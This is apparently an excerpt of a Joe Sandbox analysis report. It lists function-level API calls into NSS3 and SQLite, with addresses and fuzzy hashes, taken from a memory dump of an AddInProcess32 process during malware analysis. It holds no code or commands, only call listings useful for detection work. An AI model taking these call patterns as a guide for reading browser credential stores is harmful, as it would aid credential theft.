                                                                                      • Opcode Fuzzy Hash: 905ad352a6d634e2d0f1e42fa556633f8f325fc062d04e895ef2971bf83376e2
                                                                                      • Instruction Fuzzy Hash: 5B31C032604210AFDB129F75EC84C8B3BB9EF4A3687144125FD248BB11FB31C9179BA1
                                                                                      APIs
                                                                                      • PK11_Authenticate.NSS3(?,00000001,?), ref: 6CD06F09
                                                                                      • PK11_Authenticate.NSS3(FFFFE001,00000001,00000004), ref: 6CD06F23
                                                                                        • Part of subcall function 6CD0A899: PORT_Alloc_Util.NSS3(00000000), ref: 6CD0A8EC
                                                                                        • Part of subcall function 6CD0A899: PORT_Free_Util.NSS3(00000000), ref: 6CD0A969
                                                                                        • Part of subcall function 6CD07495: PORT_SetError_Util.NSS3(FFFFE001,?,00000003,?), ref: 6CD0751F
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CD06F76
                                                                                      • PORT_SetError_Util.NSS3(FFFFE001), ref: 6CD06FC7
                                                                                      • PORT_Free_Util.NSS3(?), ref: 6CD06FD0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Free_$AuthenticateError_K11_$Alloc_
                                                                                      • String ID:
                                                                                      • API String ID: 3209019668-0
                                                                                      • Opcode ID: 19aa93e6868cd752e9867280f8c14bb786745bc82bdf689042f6c1a08f15f56e
                                                                                      • Instruction ID: fea6b13b56fd68d608d0a8c94323095f3d12b69ffcc82bbcbbf036b49eae754e
                                                                                      • Opcode Fuzzy Hash: 19aa93e6868cd752e9867280f8c14bb786745bc82bdf689042f6c1a08f15f56e
                                                                                      • Instruction Fuzzy Hash: 4831C572D00119BFCF028FE9CC40AEEBFB9FF08364F004155ED14A6620E7358A668BA1
                                                                                      APIs
                                                                                        • Part of subcall function 6CC812DB: sqlite3_mprintf.NSS3(INSERT INTO %Q.'%q_content' VALUES(%s),?,?,6CD5A1D0,00000000,00000000,00000000), ref: 6CC81469
                                                                                        • Part of subcall function 6CC812DB: sqlite3_free.NSS3(?,00000000,00000000,000000FF,00000001,?,00000000,00000000,00000000,00000000), ref: 6CC814C8
                                                                                        • Part of subcall function 6CC812DB: sqlite3_bind_parameter_count.NSS3(?,00000000,00000000,00000000), ref: 6CC814EA
                                                                                      • sqlite3_step.NSS3(00000001,?,00000001,?,00000000,?,?,00000001,?), ref: 6CC78E8D
                                                                                      • sqlite3_reset.NSS3(00000001,?,00000001,?,00000000,?,?,00000001,?), ref: 6CC78F2D
                                                                                        • Part of subcall function 6CC84FD8: sqlite3_column_int.NSS3(6CC78EA3,?,?,6CC78EA3,?,00000001,?,00000001,?,00000000,?,?,00000001,?), ref: 6CC84FED
                                                                                      • sqlite3_column_int64.NSS3(00000001,00000000,?,00000001,?,00000001,?,00000000,?,?,00000001,?), ref: 6CC78EAB
                                                                                      • sqlite3_column_text.NSS3(00000001,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000,?), ref: 6CC78EE1
                                                                                        • Part of subcall function 6CC661DA: sqlite3_value_text.NSS3(00000000,?,?), ref: 6CC661EA
                                                                                      • sqlite3_column_bytes.NSS3(00000001,?,?,?,00000000,000000FF,00000001,00000001,?), ref: 6CC78EFF
                                                                                        • Part of subcall function 6CC66528: sqlite3_value_bytes.NSS3(00000000,?,?), ref: 6CC66538
                                                                                      • sqlite3_reset.NSS3(00000001,?,00000001,?,00000000,?,?,00000001,?), ref: 6CC78F3C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_reset$sqlite3_bind_parameter_countsqlite3_column_bytessqlite3_column_intsqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_mprintfsqlite3_stepsqlite3_value_bytessqlite3_value_text
                                                                                      • String ID:
                                                                                      • API String ID: 2319071479-0
                                                                                      • Opcode ID: feca1a821e14c2f70fe7602970954627729d65e2ac0500dd0cd9a66e7b6f9073
                                                                                      • Instruction ID: b85fdf22c5affa8da08167d8ea6c07864ffbce7f25e50c66ad4e30dd74400045
                                                                                      • Opcode Fuzzy Hash: feca1a821e14c2f70fe7602970954627729d65e2ac0500dd0cd9a66e7b6f9073
                                                                                      • Instruction Fuzzy Hash: D4318171C04218AFDB219F55C880EEE7BB9EF05768F100199F905BBB41E7359D5187A1
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE028), ref: 6CCECE23
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PK11_SignatureLen.NSS3(?), ref: 6CCECE39
                                                                                      • memset.VCRUNTIME140(?,00000000,00000030), ref: 6CCECE88
                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,?,?,?,?,00000000,00000030), ref: 6CCECEB0
                                                                                      • DER_Encode_Util.NSS3(00000000,?,6CD876D0,?), ref: 6CCECECD
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CCECEDA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$AlgorithmEncode_ErrorError_Free_K11_Signaturememset
                                                                                      • String ID:
                                                                                      • API String ID: 3590054332-0
                                                                                      • Opcode ID: d3ff90bbd59943020ae5bba6fd0bdebcf97f6d2ab3a985f86a49d15eb4e4d5a3
                                                                                      • Instruction ID: 31b9482236cc8d1b189376c7301ee2b8dc5762e1d05fd22aa1531a5b7716f2da
                                                                                      • Opcode Fuzzy Hash: d3ff90bbd59943020ae5bba6fd0bdebcf97f6d2ab3a985f86a49d15eb4e4d5a3
                                                                                      • Instruction Fuzzy Hash: 4F219132945219BBDB11EFA8DC80ADE7BB8EB09768F200165FD14A7B60E7359E148790
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EE45
                                                                                      • PORT_Free_Util.NSS3(?,?,00000000,?,?,?,?,?,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EE4D
                                                                                      • PR_Lock.NSS3(?,00000000,00001002,?), ref: 6CD0EE6E
                                                                                      • PR_Unlock.NSS3(?), ref: 6CD0EEA7
                                                                                      • PORT_Free_Util.NSS3(EB2BE856,?,?,?), ref: 6CD0EEC3
                                                                                      • PK11_FreeSlot.NSS3(D611683D,00000000,?,?,00000000,?,6CCFE5A8,00000000,00000001), ref: 6CD0EECC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free_Util$FreeK11_LockSlotUnlockmemset
                                                                                      • String ID:
                                                                                      • API String ID: 24047792-0
                                                                                      • Opcode ID: 197052e34cc00faa951dfb7b7aadfe4511312fb3d82a87ad298e50d75b4bafd2
                                                                                      • Instruction ID: 06e4fbaf4107bcb43baa1eaa51ea5e2096e116d2682955792df21837e3b2cda6
                                                                                      • Opcode Fuzzy Hash: 197052e34cc00faa951dfb7b7aadfe4511312fb3d82a87ad298e50d75b4bafd2
                                                                                      • Instruction Fuzzy Hash: E7313531605B15EFD7219F29D880B96B7F0FF04719F204A2DE1AA42E60C731F854CB90
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000000,?,?,?,6CD42258,?), ref: 6CCE4E8F
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_NewArena_Util.NSS3(00000800,?,?,00000000,?,?,?,6CD42258,?), ref: 6CCE4EB3
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000010,?,?,00000000,?,?,?,6CD42258,?), ref: 6CCE4EC2
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,00000010,?,?,00000000,?,?,?,6CD42258,?), ref: 6CCE4EDF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_Arena$Arena_ErrorError_
                                                                                      • String ID:
                                                                                      • API String ID: 1294190707-0
                                                                                      • Opcode ID: 373d724864efde6bcbbbf7e10328edfad8c2a9d59a750493b8eb9b8c08563f9e
                                                                                      • Instruction ID: 2fb31142563e52814954d24137da5a0e5301c5eb32d1cc947d13848fb8de535b
                                                                                      • Opcode Fuzzy Hash: 373d724864efde6bcbbbf7e10328edfad8c2a9d59a750493b8eb9b8c08563f9e
                                                                                      • Instruction Fuzzy Hash: F721C97260C200AFD709DF99D8C1A6E77B9DB8AB24B20816EE5449BF41F770DD054764
                                                                                      APIs
                                                                                      • PORT_InitCheapArena.NSS3(?,00000090,00000000,00000000,?,?,00000000,00000000,6CCED42E,6CCE6283,?,6CCED42E,00000000,?,00000000,?), ref: 6CCEA930
                                                                                        • Part of subcall function 6CD1CA46: PL_InitArenaPool.NSS3(00000000,security,00000000,00000008,?,6CCE33EC,?,00000800,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E), ref: 6CD1CA5E
                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C,?,00000090,00000000,00000000,?,?,00000000,00000000,6CCED42E,6CCE6283,?,6CCED42E,00000000,?,00000000), ref: 6CCEA937
                                                                                        • Part of subcall function 6CD1CC25: PR_Calloc.NSS3(00000001,00000001,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC41
                                                                                        • Part of subcall function 6CD1CC25: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1CA8F,00000024,?,?,6CCE3237,00000800,?,?,6CCDCC16,00000000), ref: 6CD1CC56
                                                                                      • PORT_Alloc_Util.NSS3(?,6CCE6283,?,00000000,00000000,?,?,00000000,00000000,6CCED42E,6CCE6283,?,6CCED42E,00000000,?,00000000), ref: 6CCEA950
                                                                                        • Part of subcall function 6CD1C68C: PR_Malloc.NSS3(00000001,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6A6
                                                                                        • Part of subcall function 6CD1C68C: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6BA
                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CD607C8,0000007C,6CCE6283,?,00000000,00000000,?,?,00000000,00000000,6CCED42E,6CCE6283,?,6CCED42E), ref: 6CCEA976
                                                                                        • Part of subcall function 6CD18A99: PORT_SetError_Util.NSS3(FFFFE08C,?,?,00000000), ref: 6CD18AE6
                                                                                        • Part of subcall function 6CCEA801: memset.VCRUNTIME140(E80875FF,00000000,00000011,?,00000000,6CCE6283,?,6CCEA998,6CCE6283,00000000,?,?,?,6CCE6283,?,00000000), ref: 6CCEA82B
                                                                                        • Part of subcall function 6CCEA801: memcpy.VCRUNTIME140(00000000,458D1875,6CCEA998,E80875FF,00000000,00000011,?,00000000,6CCE6283,?,6CCEA998,6CCE6283,00000000), ref: 6CCEA838
                                                                                        • Part of subcall function 6CCEA801: memcpy.VCRUNTIME140(E80875FF,458D1875,00000011,?,00000000,6CCE6283,?,6CCEA998,6CCE6283,00000000,?,?,?,6CCE6283,?,00000000), ref: 6CCEA85E
                                                                                        • Part of subcall function 6CCEA801: PORT_SetError_Util.NSS3(FFFFE89D,?,00000000,6CCE6283,?,6CCEA998,6CCE6283,00000000,?,?,?,6CCE6283,?,00000000,00000000,?), ref: 6CCEA872
                                                                                      • SECITEM_FreeItem_Util.NSS3(00000000,00000001,6CCE6283,?,00000000,00000000,?,?,00000000,00000000,6CCED42E,6CCE6283,?,6CCED42E,00000000,?), ref: 6CCEA9B9
                                                                                      • PORT_DestroyCheapArena.NSS3(?,?,00000000,00000000,?,?,00000000,00000000,6CCED42E,6CCE6283,?,6CCED42E,00000000,?,00000000,?), ref: 6CCEA9C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_CheapErrorError_InitItem_memcpy$CallocDecodeDestroyFreeMallocPoolQuickmemset
                                                                                      • String ID:
                                                                                      • API String ID: 2331338705-0
                                                                                      • Opcode ID: 8f76ce946c7ba4f937c4ef6f5bfb025f96dcc4fb9ce3f49a64f00a1d1fbc8a4a
                                                                                      • Instruction ID: c29a91eaa88ce0d90daa274a7be2deb9246975b39b99fcfe17a55bedd953b573
                                                                                      • Opcode Fuzzy Hash: 8f76ce946c7ba4f937c4ef6f5bfb025f96dcc4fb9ce3f49a64f00a1d1fbc8a4a
                                                                                      • Instruction Fuzzy Hash: A1217472D047096FDB10DBA5D881ACEBBFCDB49354F20456BE904E6A40FB31EA0586A4
                                                                                      APIs
                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CCD7E32
                                                                                        • Part of subcall function 6CCD36F3: PR_GetCurrentThread.NSS3(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD36F6
                                                                                      • PR_QueueJob.NSS3(?,?,?,?), ref: 6CCD7E50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentErrorQueueThread
                                                                                      • String ID:
                                                                                      • API String ID: 3248734569-0
                                                                                      • Opcode ID: 42069dccf023dd9848b58e4c6ef24902afefcaf1d93db4e2416b612953c3dba1
                                                                                      • Instruction ID: eedf553d8dbe440e4198e303cc0e949ff2b2a6727817e77d7746945225a6bdb0
                                                                                      • Opcode Fuzzy Hash: 42069dccf023dd9848b58e4c6ef24902afefcaf1d93db4e2416b612953c3dba1
                                                                                      • Instruction Fuzzy Hash: 1C314875504706AFC715CF2AD88098ABBF1FF09728721852EE61587F60E732F864DB90
                                                                                      APIs
                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6CCEA9EA
                                                                                        • Part of subcall function 6CD1C68C: PR_Malloc.NSS3(00000001,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6A6
                                                                                        • Part of subcall function 6CD1C68C: PR_SetError.NSS3(FFFFE013,00000000,?,?,6CD1BB9B,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1C6BA
                                                                                      • PORT_ZAlloc_Util.NSS3(?), ref: 6CCEAA02
                                                                                      • PORT_Free_Util.NSS3(00000000), ref: 6CCEAA12
                                                                                        • Part of subcall function 6CCEA87D: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,6CCEAA55,?,?), ref: 6CCEA8B1
                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CD607C8,?,?,?,?), ref: 6CCEAA75
                                                                                        • Part of subcall function 6CD1A778: SEC_ASN1Encode_Util.NSS3(00000000,00000000,6CD1AE21,00000000,?,?,6CCDF938,?,00000000,00000000,?,?,?,6CCDF91A,?,?), ref: 6CD1A78F
                                                                                      • PORT_Free_Util.NSS3(?,00000000,?,?,6CD607C8,?,?,?,?), ref: 6CCEAA7F
                                                                                      • PORT_Free_Util.NSS3(?,?,00000000,?,?,6CD607C8,?,?,?,?), ref: 6CCEAA87
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Free_$Alloc_$EncodeEncode_ErrorItem_Mallocmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1088961560-0
                                                                                      • Opcode ID: 562c35b990ab8439e79ca5d1cbc07f53cbb05f2435b3b0a3fd5eac580e222fe2
                                                                                      • Instruction ID: 4fd651aa483436dd2ab251acc4ef62346b4ca4d0a920e26c569d168d81492c06
                                                                                      • Opcode Fuzzy Hash: 562c35b990ab8439e79ca5d1cbc07f53cbb05f2435b3b0a3fd5eac580e222fe2
                                                                                      • Instruction Fuzzy Hash: 52218672D04219AFCB00DFA9D880ADEBBF4EF8D724F10812AE904F7750D7305A458BA4
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(?,?,?,?,?,?,6CD23CFA,?,?,?,?,?,?,?,?,?), ref: 6CD23D32
                                                                                        • Part of subcall function 6CD1C8A6: PR_Lock.NSS3(?,?,?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?), ref: 6CD1C8BA
                                                                                        • Part of subcall function 6CD1C8A6: PR_Unlock.NSS3(?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000), ref: 6CD1C8C9
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,00000000,?,?,?,?,?,6CD23CFA,?,?,?,?,?,?,?,?), ref: 6CD23D4E
                                                                                      • SGN_DestroyDigestInfo_Util.NSS3(?), ref: 6CD23D9C
                                                                                      • PT_FPrintStats.NSS3(?,00000000,?), ref: 6CD23DA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$DestroyDigestInfo_LockMark_PrintRelease_StatsUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 1371686053-0
                                                                                      • Opcode ID: 10e9d4188e9b8af0e0d21618a56296d8833658aa764fe01de34e632b8b342ec6
                                                                                      • Instruction ID: 0905cd38caa532e1f91b62215b63d8077c54378ed1dd9f486485c12c1305bb92
                                                                                      • Opcode Fuzzy Hash: 10e9d4188e9b8af0e0d21618a56296d8833658aa764fe01de34e632b8b342ec6
                                                                                      • Instruction Fuzzy Hash: BC217C76414109FBDB125F59DC00EEE3BADEF453ACF104529FE1452A70E73AC9649BA0
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013), ref: 6CCE4939
                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CCE496B
                                                                                      • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,?), ref: 6CCE4986
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013), ref: 6CCE4997
                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CD5FD30), ref: 6CCE49AF
                                                                                        • Part of subcall function 6CD1A778: SEC_ASN1Encode_Util.NSS3(00000000,00000000,6CD1AE21,00000000,?,?,6CCDF938,?,00000000,00000000,?,?,?,6CCDF91A,?,?), ref: 6CD1A78F
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CCE49C8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena_EncodeError_$Encode_FreeInteger_Item_Unsigned
                                                                                      • String ID:
                                                                                      • API String ID: 899356541-0
                                                                                      • Opcode ID: a0d967adcb7b9f30b26ec65fc21cfb0c16ec461a0e4bde971ec80899bd8550f8
                                                                                      • Instruction ID: fbf7a298d0283612ac01cf51cbdbae7722bedb3d03ff2cde982df083eef337ec
                                                                                      • Opcode Fuzzy Hash: a0d967adcb7b9f30b26ec65fc21cfb0c16ec461a0e4bde971ec80899bd8550f8
                                                                                      • Instruction Fuzzy Hash: 63210B729093159ADB109FF59C806A5B3ECEB4A328B10063AEA65B6ED0F73055048765
                                                                                      APIs
                                                                                      • PR_Init.NSS3(?,?,6CCCBAF6,00000002,00000001,00000000,6CCCBB1F,00000000,00000000), ref: 6CCCBE3E
                                                                                        • Part of subcall function 6CCC6EBA: PR_CallOnce.NSS3(6CD88840,R,6CCCBE67,?,?,6CCCBAF6,00000002,00000001,00000000,6CCCBB1F,00000000,00000000), ref: 6CCC6EC4
                                                                                        • Part of subcall function 6CCCF882: socket.WSOCK32(00000000,00000001,00000000,00000000), ref: 6CCCF899
                                                                                        • Part of subcall function 6CCCF882: WSAGetLastError.WSOCK32(00000000,00000001,00000000,00000000), ref: 6CCCF8A5
                                                                                      • PR_SetError.NSS3(FFFFE89F,00000000,?,?,6CCCBAF6,00000002,00000001,00000000,6CCCBB1F,00000000,00000000), ref: 6CCCBE54
                                                                                      • PR_AllocFileDesc.NSS3(00000000,6CD87308,00000000), ref: 6CCCBEA2
                                                                                      • PT_FPrintStats.NSS3(00000000,00000000), ref: 6CCCBEB0
                                                                                      • _pr_push_ipv6toipv4_layer.NSS3(00000000,?,?,00000000), ref: 6CCCBECC
                                                                                      • PR_Close.NSS3(00000000,?,?,00000000), ref: 6CCCBED8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$AllocCallCloseDescFileInitLastOncePrintStats_pr_push_ipv6toipv4_layersocket
                                                                                      • String ID:
                                                                                      • API String ID: 2314625162-0
                                                                                      • Opcode ID: 76957bc35031b826c2b5fb0e29814335658c1ebf927ad2a113c95abdecd9b622
                                                                                      • Instruction ID: 3cd4d601f6fc28fb6e91ee46882d8679da9cba48a399a8060948259c48f0b2bc
                                                                                      • Opcode Fuzzy Hash: 76957bc35031b826c2b5fb0e29814335658c1ebf927ad2a113c95abdecd9b622
                                                                                      • Instruction Fuzzy Hash: 99115B33B4461077CB1156B99C906EF32649B42F3CF24432EFB2466E80FB30448541D7
                                                                                      APIs
                                                                                      • PORT_NewArena_Util.NSS3(00000800,00000000,?,?,00000000,?,6CD3F3B2,00000000,?,?,6CD3EE10,00000000,?,?,?), ref: 6CCE4F44
                                                                                        • Part of subcall function 6CD1CA68: PR_SetError.NSS3(FFFFE013,00000000,?,6CCE3237,00000800,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA7B
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,00000000,?,?,00000000,?,6CD3F3B2,00000000,?,?,6CD3EE10,00000000,?,?,?), ref: 6CCE4F53
                                                                                        • Part of subcall function 6CD1C6C7: PR_Lock.NSS3(?,?,00000000,00000000,?,6CCE3248,00000000,00000008,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C6F4
